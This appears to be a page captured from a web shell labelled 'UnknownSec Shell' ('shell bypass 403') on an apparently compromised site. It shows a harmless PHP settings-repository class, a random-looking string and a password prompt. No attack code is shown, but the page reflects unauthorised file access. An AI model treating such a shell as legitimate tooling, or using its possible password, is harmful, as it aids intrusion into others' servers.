shell bypass 403

UnknownSec Shell


name : GeneralSettingRepository.php
<?php

namespace Modules\Setting\Repositories;


class GeneralSettingRepository implements GeneralSettingRepositoryInterface
{


    public function update(array $data)
    {
        foreach ($data as $key => $value) {
            UpdateGeneralSetting($key, $value);
        }
        return true;
    }
}

© 2025 UnknownSec
afwwrfwafr45458465
Password